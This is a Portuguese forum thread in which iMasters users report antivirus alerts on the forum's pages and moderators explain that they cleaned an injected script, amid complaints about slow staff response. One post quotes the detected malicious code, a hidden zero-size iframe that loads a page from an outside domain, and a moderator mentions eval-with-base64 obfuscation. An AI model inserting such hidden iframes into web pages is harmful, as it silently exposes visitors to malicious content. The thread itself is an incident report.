Usamos cookies para medir audiência e melhorar sua experiência. Você pode aceitar ou recusar a qualquer momento. Veja sobre o iMasters.
Criei um tópico em "outros" http://forum.imasters.com.br/topic/431406-kaspersky-detecta-virus-no-imaster/page__pid__1702921#entry1702921
Mas acho que o lugar correto é aqui.
Dê uma atenção a isso:
Estou criando esse post pois uso o ANTI-VIRUS KASPERSKY e está acusando um vírus nas páginas dos fóruns do imaster, o código malicioso o qual está acusando é esse:
<IFraME src="[http://fetvidsonline.com/count.php"](http://fetvidsonline.com/count.php) width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></IFraME>>
Ele está localizado no final da página após o fechamento do HTML;At+
Idem.
Também não é possível inserir imagem pela tag 'img' do fórum, estou usando direto o endereço fornecido pelo imageshack.us.
Rebebi um aviso também do Symantec.
Será que é só o Panda Cloud que não abriu o bico?
[EDIT]
Não sei se tem a ver, mas toda vez que tento fechar alguma aba do iMasters, do FF, ele trava todo e pede pra reiniciar.
De repente...
Idem 2 :o
/applications/core/interface/imageproxy/imageproxy.php?img=http://img198.imageshack.us/img198/4489/forumvirus.jpg&key=b9bd39c747beddbf05b6e571eb8df24fb82be3db13174074eadafaef470eafb1" alt="forumvirus.jpg" />
o fórum esta bugadão rsrsrs, aqui ta dando erro de java que simplesmente trava o navegador as vezes, e esta ocorrendo somente nesse fórum, quando entro em outros sites, fico por vários minutos e não acontece o mesmo erro.
>
Não sei se tem a ver, mas toda vez que tento fechar alguma aba do iMasters, do FF, ele trava todo e pede pra reiniciar.
De repente...
Mesma situação aqui.
Eles sempre deixam um rasto, recentemente aconteceu isso comigo também, foi inserido um vírus no meu website do NADA. Até abri um tópico aqui mas ninguém me respondeu, perceba no final do rodapé o rastro deles
>
Eu não chamaria de rastro, eu chamaria de burrice, já que trata-se de um erro de code no html.
E nesse caso não existe certeza de que se trata de um vírus, é estranho, devido aos relatos e erros corriqueiros, mais ainda não há como afirmar, também chega a ser preocupante, e se for, o lammer invadiu o IPB para colocar o code do iframe e ele teria que ter acesso ao admcp do ipb o que me deixa preocupado já que abriria várias possibilidades.
Mas é apenas suposição, esperemos para ver o que os administradores teem a dizer a respeito.
O engraçado mesmo é que olhando o code html da index do fórum se vê que ele tem muitos erros, nem fechamento da tag html </html> existe rsrsrsr e por ser um fórum focado para a área da programação esse tipo de coisa é inaceitável, pois deveria servir como exemplo.
Considerando o horário que o tópico foi criado >> 17:48
é difícil compreender a ausência de algum responsável ao menos para notificar o suporte do fórum
e dar um retorno aos colaboradores.
:huh:
>
é difícil compreender a ausência de algum responsável ao menos para notificar o suporte do fórum
e dar um retorno aos colaboradores.
Vou ajudá-la a compreender, Elektra:
1. Nem todos possuem acesso ao FTP.
2. Nem todos os que possuem acesso, conhecem a linguagem em que o fórum é escrito.
3. Nem todos estão online 100% do tempo no fórum.
4. O sistema do fórum iMasters possui, com todas as modificações feitas, porém contanto apenas os arquivos PHP e JS:
3565 arquivos com um total de 1074589 linhas de código.
5. Um ataque desse pode utilizar-se de várias variações para que seja difícil ser localizado, entre elas, eval com base64.
6. Pode estar em qualquer lugar, em vários lugares ou fragmentado em várias partes.
Agora pergunto a você como desenvolvedora:
Quanto tempo você acha que levaria para localizar "sabe-se lá o que" em "sabe-se lá onde", com a única certeza de que o que você procura está localizado entre as 1074589 linhas de código de um sistema que não foi você quem escreveu ?
De qualquer forma, o problema já foi resolvido.
;)
João Batista Neto, passamos por algo semelhante aqui em nosso portal, porém descobrimos que não era ataque e sim os próprios reporters que injetavam "sem querer" o iframe malicioso, mas era no corpo das notícias, o que fizemos para solucionar, bloqueamos o ctrl+c e ctrl+v, pois a preguiça deles era tanta que copiavam uma notícia de uma agência ou outro site e a mesma já vinha com o código e como nosso portal permite HTML o iframe era executado. Mas no caso do fórum é complicado pois é diretamente no código.
At+
>
Mas no caso do fórum é complicado pois é diretamente no código.
De fato, Quelipe,
Mas nesse caso, foi uma injeção direta no código do sistema e quem lançou o ataque sabia exatamente o que estava fazendo.
Ainda essa semana vamos fazer uma varredura em todo o sistema em busca de possíveis brechas na segurança.
Como outros, aqui tbm foi acusado o virus !
mas acho que ja foi solucionado !
Então foi uma tentativa de sabotar o fórum ?!?!?
Sem esquecer que todos que estão aqui fazem o que fazem ("trabalham") sem receber nada.
Desde a menor até a maior tarefa todos dispendemos nosso tempo privado.
Tempo que poderiamos adiantar algo no trabalho, ficar com a família, curtir com amigos. Pensem nisso antes de reclamarem (principalmente madrugada adentro)!
>
Agora pergunto a você como desenvolvedora:
Quanto tempo você acha que levaria para localizar "sabe-se lá o que" em "sabe-se lá onde", com a única certeza de que o que você procura está localizado entre as 1074589 linhas de código de um sistema que não foi você quem escreveu ?
Aproveitando o tópico, fazem semanas que o outro fórum recém lançado, o iMasters Code, está fora do ar. Ele foi alvo de ataques também, está todo esse tempo em manutenção, ou foi descontinuado?
Eu achei a idéia do iMasters Code muito boa, um local onde todos podem compartilhar seus códigos, espero que não seja descontinuado.
Leozitho, o Code também foi atacado, mas por lá foi mais complicado. Esperamos, não prometemos, que ele volte ainda essa semana.
Valeu pela informação Giovani.
Ow, quer dizer que o "mini antivírus" (bem meia boca) que o IP.Board tem dentro dele sequer ficou amarelo, avisando que alguma coisa poderia estar errada com algum arquivo?
>
Vou ajudá-la a compreender, Elektra:
João, por favor leia com mais atenção o que escrevi.
Idem Giovani.
Loguei diversas vezes desde que o problema começou, vi quem estava na área, mas me abstenho mencionar nomes.
Ninguém cobrou milagres, e todos temos noção do tamanho do fórum, mas faltou atitude da parte de algum global ou administrador em dar um retorno aos colaboradores ao menos para dizer que o suporte do fórum foi informado.
Isso se chama respeito. Todos nós que dispensamos nosso tempo gratuitamente buscando ou compartilhando conhecimentos merecemos.
Fico feliz por estar resolvido e pelo interesse em fortalecer as defesas do fórum.
>
João, por favor leia com mais atenção o que escrevi.
Eu compreendi o que você escreveu, Elektra.
Veja:
1. O problema foi reportado as 17:48 do dia 27
2. Mesmo que houvesse alguém do suporte online, dificilmente alguma coisa teria sido feita no dia 27, afinal, já eram quase 18 horas.
3. No dia 28, as 4:30 eu estava online, abri o FTP, localizei e removi o problema.
Se não levarmos em consideração a parte da noite, sobraram apenas alguns minutos do dia 27 e, antes mesmo de começar o dia 28, o problema já estava resolvido.
Não sei quanto a você, mas eu considero isso uma solução bastante eficiente.
;)
EDIT: Pessoal, meu GTalk, MSN e Skype estão disponíveis no meu perfil do fórum, se algum dia alguém detectar um problema semelhante, basta dar um toque.
>
EDIT: Pessoal, meu GTalk, MSN e Skype estão disponíveis no meu perfil do fórum, se algum dia alguém detectar um problema semelhante, basta dar um toque.
Consciência Pesou !
João alguma novidade sobre o Avatar contaminado?
Meu avira ainda continua disparando alertas!! :huh:
/applications/core/interface/imageproxy/imageproxy.php?img=http://img854.imageshack.us/img854/7138/avatarcomvirus.jpg&key=4826d0e069c86d22ef253c09133f183047bf976abd46226f708be2ce2b36f3f0" alt="avatarcomvirus.jpg" />
Foi apenas um aviso para pessoas que gostam de incomodar, de tumultuar, que não estão satisfeitas com nada que, apesar de elas serem desse jeito, mesmo assim podem entrar em contato.
>
Consciência Pesou !
Giovani... mordeu agora ? Princesa.
Ninguém está tumultuando.
Você que sempre vem querer dar uma de "Vou acabar com esses usuários logo!".
Fica dizendo que vocês trabalham sem ganhar nada...
>
Sem esquecer que todos que estão aqui fazem o que fazem ("trabalham") sem receber nada.
Desde a menor até a maior tarefa todos dispendemos nosso tempo privado.
Tempo que poderiamos adiantar algo no trabalho, ficar com a família, curtir com amigos. Pensem nisso antes de reclamarem (principalmente madrugada adentro)!
Se você se orgulhasse tanto disso não ficava dizendo isso todo tópico que abrem para criticar alguma coisa do fórum. Ou em outras palavras: Jogando na cara.
Eu não ligo que você perde seu tempo com o fórum. Isso é uma escolha sua e o problema é seu que você está no fórum e não com sua família. Na minha opinião uma péssima escolha para um pai de família.
Não vou pensar nisso antes de reclamar. Senão ninguém reclamaria!
Agora estou tumultuando.
Também está acontecendo aqui.